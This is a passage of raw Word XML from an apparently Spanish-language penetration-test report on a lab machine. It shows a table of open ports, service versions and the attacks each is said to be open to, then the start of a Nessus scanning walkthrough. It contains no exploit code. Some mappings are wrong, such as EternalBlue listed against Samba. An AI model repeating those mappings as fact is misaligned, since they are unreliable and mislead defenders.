          <w:p w14:paraId="1C71EE6E" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D4A56F" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>telnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DDB8B5C" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a intercepción de credenciales, ataques de fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="7F750F55" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E3F6C9" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>25/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B7F6F22" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>smtp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D75DB2" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Postfix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>smtpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B323055" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a ataques de spam, ejecución de comandos a través de STARTTLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="2D361A46" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48DA23CB" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>53/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739BFC95" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>domain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4235D82A" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>ISC BIND 9.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B29CCD" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a envenenamiento de DNS, DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="3092AF13" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F9AB2F2" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>80/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CCF9447" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027841A3" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>httpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> 2.2.8 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7AB586" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Vulnerable a ataques web como XSS, SQL </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Injection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>, RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="5FF0D3FA" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06532AC5" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>139/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F9C8A41" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7370AC69" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> 3.X - 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44933F51" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Vulnerable a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>exploits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> como </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>, ejecución de comandos remotos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="64C2B2C3" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3500F796" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>445/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01270033" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503F5BAD" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> 3.0.20-Debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29ACC9B3" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve">Vulnerable a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>exploits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> como </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>, ejecución de comandos remotos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="47E8CA68" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C50E1C5" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>3306/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65F210DD" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="127DE75F" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0321EF5F" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a inyección SQL, ataques de fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="1810534B" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48A9C8C8" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>5432/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="348878B3" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>postgresql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728B2EE9" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>PostgreSQL DB 8.3.0 - 8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60939036" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a inyección SQL, ataques de fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC6EE1" w:rsidRPr="00EC6EE1" w14:paraId="1612AE0F" w14:textId="77777777" w:rsidTr="00EC6EE1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45581865" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>5900/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FACC4B7" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>vnc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02037B26" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>VNC (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>protocol</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC6EE1">
              <w:t xml:space="preserve"> 3.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A980C09" w14:textId="77777777" w:rsidR="00E40B8C" w:rsidRPr="00EC6EE1" w:rsidRDefault="00E40B8C" w:rsidP="00EC6EE1">
            <w:r w:rsidRPr="00EC6EE1">
              <w:t>Vulnerable a ataques de fuerza bruta, acceso remoto sin autorización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65AC386F" w14:textId="77777777" w:rsidR="00D64594" w:rsidRDefault="00D64594" w:rsidP="00EC6EE1"/>
    <w:p w14:paraId="1AFDE300" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00EC6EE1"/>
    <w:p w14:paraId="18FA4753" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00EC6EE1"/>
    <w:p w14:paraId="548F0A33" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00EC6EE1"/>
    <w:p w14:paraId="0E873892" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00EC6EE1"/>
    <w:p w14:paraId="7491FE0C" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCBF75D" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:r>
        <w:t xml:space="preserve">Para el análisis de vulnerabilidades se utilizó la herramienta </w:t>
      </w:r>
      <w:r w:rsidR="009A5D6E">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A5D6E">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>essus</w:t>
      </w:r>
      <w:r w:rsidR="009A5D6E">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t>buscando identificar correctamente toda la superficie de ataque con una herramienta comercial. El proceso fue el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD7EED" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:r>
        <w:t xml:space="preserve">1.- Se instaló </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nessus</w:t>
      </w:r>
      <w:r w:rsidR="009A5D6E">
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en nuestra terminal de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425B49A0" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:r>
        <w:t>2.- Me registré en la plataforma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43245EF5" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:r>
        <w:t xml:space="preserve">3.- Una vez que ingresamos creamos un nuevo análisis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655BC30E" w14:textId="77777777" w:rsidR="00007EB3" w:rsidRDefault="00007EB3" w:rsidP="00007EB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
